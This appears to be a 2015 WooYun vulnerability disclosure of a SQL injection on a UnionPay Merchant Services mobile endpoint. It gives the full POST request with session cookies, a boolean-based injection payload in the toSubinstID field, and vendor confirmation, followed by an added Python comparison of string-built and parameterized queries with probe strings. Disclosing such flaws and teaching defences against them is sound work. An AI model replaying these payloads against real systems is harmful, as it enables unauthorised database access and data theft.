
Vulnerability summary

Defect ID: wooyun-2015-0143470

Title: SQL injection on a 银联商务 (UnionPay Merchant Services) site (13 databases affected)

Vendor: 银联商务 (UnionPay Merchant Services)

Author: 中央军

Submitted: 2015-09-25 18:54

Fixed: 2015-11-13 10:28

Published: 2015-11-13 10:28

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-25: Details sent to the vendor; awaiting vendor handling
2015-09-29: Vendor confirmed; details visible to the vendor only
2015-10-09: Details opened to core white hats and domain experts
2015-10-19: Details opened to regular white hats
2015-10-29: Details opened to intern white hats
2015-11-13: Details opened to the public

Brief description:

Detailed description:

https://m.chinaums.com/

POST /geongf/qmf/newPosApply/save HTTP/1.1
Content-Type: application/json
Content-Length: 225
X-Requested-With: XMLHttpRequest
Referer: http://m.chinaums.com:80/
Cookie: JSESSIONID=www_80_2!!0000v0a8kLNFyVZF03vHus4hVN_:-1; GEONGF_SESSIONID=94PqV0yJwHhnZG218n0Qtm2qn9X1nVpgk6rJpmpsQzpJr3VQCk0P!-1218752366!1178501674; city=3965aecfa57ca36b; _ga=GA1.2.1857062971.1442067218; _gat=1; Hm_lvt_1c0d3d1413bff5b48a4a97f64a35f6a4=1442067221,1442067718; Hm_lpvt_1c0d3d1413bff5b48a4a97f64a35f6a4=1442067718; HMACCOUNT=B51BE74D997DCCE7; UISTELJSESSIONID=p1tfV0zN6y1TmHNtLG2DmZBB3rc01JYvFc2nYQh8p05QnDMJN5W7!1074120133!NONE; yuyanname=fan; BAIDUID=E3C8BA7C9C3C71E347481E0390F20273:FG=1; tc=AQAAAGfuVnXEPQwASlByfMNLOZu4gGCy
Host: m.chinaums.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
{"address":"e","business":"","content":"","email":"sample@email.tst","fax":"e","industry":"","linkman":"e","name":"e","phone":"e","subinstID":"","toSubinstID":"-1' OR 1=1* AND 000161=000161 -- "}

The toSubinstID field is the injection point.
When the condition is true:

[screenshot: 1.png]

When the condition is false:

[screenshot: 2.png]

13 databases are affected:

[screenshot: 8.png]

Some of the tables listed:

[screenshot: 9.png]

I didn't dare to pull any data~
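To show why the toSubinstID value above flips the query between "true" and "false" results, here is an added example (not part of the original report) that contrasts string-built SQL with a bound parameter on an in-memory SQLite table. The table, column names and the two probe values are constructed assumptions standing in for the real backend.

```python
import json
import sqlite3


def make_db():
    # Constructed stand-in for the sub-institution lookup table (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subinst (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO subinst VALUES (?, ?)",
                     [(1, "branch-a"), (2, "branch-b")])
    return conn


def lookup_vulnerable(conn, to_subinst_id):
    # Vulnerable pattern: the JSON field is spliced into the SQL text, so a
    # quote and a trailing comment let the caller rewrite the WHERE clause.
    sql = f"SELECT id, name FROM subinst WHERE id = '{to_subinst_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, to_subinst_id):
    # Hardened pattern: the value is bound as data; whatever characters it
    # holds, the statement shape stays "WHERE id = ?".
    sql = "SELECT id, name FROM subinst WHERE id = ?"
    return conn.execute(sql, (to_subinst_id,)).fetchall()


# Constructed true/false probes in the style of the report's request body.
PROBE_TRUE = "-1' OR 1=1 -- "
PROBE_FALSE = "-1' OR 1=2 -- "


def body_with_probe(probe):
    # Minimal constructed JSON body with only the field that matters here.
    return json.dumps({"name": "e", "subinstID": "", "toSubinstID": probe})


def demo():
    """Row counts each handler returns for the true and false probes."""
    conn = make_db()
    results = {}
    for label, probe in (("true", PROBE_TRUE), ("false", PROBE_FALSE)):
        field = json.loads(body_with_probe(probe))["toSubinstID"]
        results[f"vuln_{label}"] = len(lookup_vulnerable(conn, field))
        results[f"safe_{label}"] = len(lookup_parameterized(conn, field))
    return results


if __name__ == "__main__":
    print(demo())
```

The string-built query returns every row for the true probe and nothing for the false probe, which is exactly the behaviour difference the screenshots above rely on; the bound-parameter query returns nothing for either, because neither probe is a valid id.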

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source as 中央军@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 5

Confirmed: 2015-09-29 10:26

Vendor reply:

Thanks to the white hat for the heads-up.

Latest status:

None yet